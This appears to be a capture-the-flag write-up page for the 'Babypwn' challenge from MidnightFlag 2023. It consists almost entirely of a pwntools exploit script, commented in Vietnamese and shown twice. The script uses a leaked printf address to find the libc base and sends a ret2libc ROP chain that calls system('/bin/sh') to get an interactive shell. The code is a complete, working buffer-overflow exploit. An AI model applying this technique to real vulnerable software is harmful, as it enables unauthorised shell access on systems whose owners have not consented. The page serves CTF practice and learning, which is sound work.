Babypwn - MidnightFlag2023

from pwn import * 

elf = context.binary = ELF("./babypwn")
libc = ELF("./libc.so.6")
r = process()

#lấy ra libc _printf được leak
r.recvuntil(b"leak: ")
printf_leak = int(r.recv(), 16)  
log.success(f"Printf Leak = {hex(printf_leak)}") 

# Lấy ra libc_base
libc.address = printf_leak - libc.sym["printf"]
log.success(f"Libc Base: {hex(libc.address)}")

#libc_gadget
pop_rdi = libc.address + 0x000000000002a3e5
ret = pop_rdi + 1
system = libc.sym["system"]
binsh = next(libc.search(b"/bin/sh"))

payload = flat("A" * 72,ret,pop_rdi,binsh,system)
r.sendline(payload)
r.interactive()

PreviousWidget - Angstrom2023 Nextfrorg - BYUCTF 2023

Last updated 1 year ago

Babypwn - MidnightFlag2023

from pwn import * 

elf = context.binary = ELF("./babypwn")
libc = ELF("./libc.so.6")
r = process()

#lấy ra libc _printf được leak
r.recvuntil(b"leak: ")
printf_leak = int(r.recv(), 16)  
log.success(f"Printf Leak = {hex(printf_leak)}") 

# Lấy ra libc_base
libc.address = printf_leak - libc.sym["printf"]
log.success(f"Libc Base: {hex(libc.address)}")

#libc_gadget
pop_rdi = libc.address + 0x000000000002a3e5
ret = pop_rdi + 1
system = libc.sym["system"]
binsh = next(libc.search(b"/bin/sh"))

payload = flat("A" * 72,ret,pop_rdi,binsh,system)
r.sendline(payload)
r.interactive()

PreviousWidget - Angstrom2023 Nextfrorg - BYUCTF 2023

Last updated 1 year ago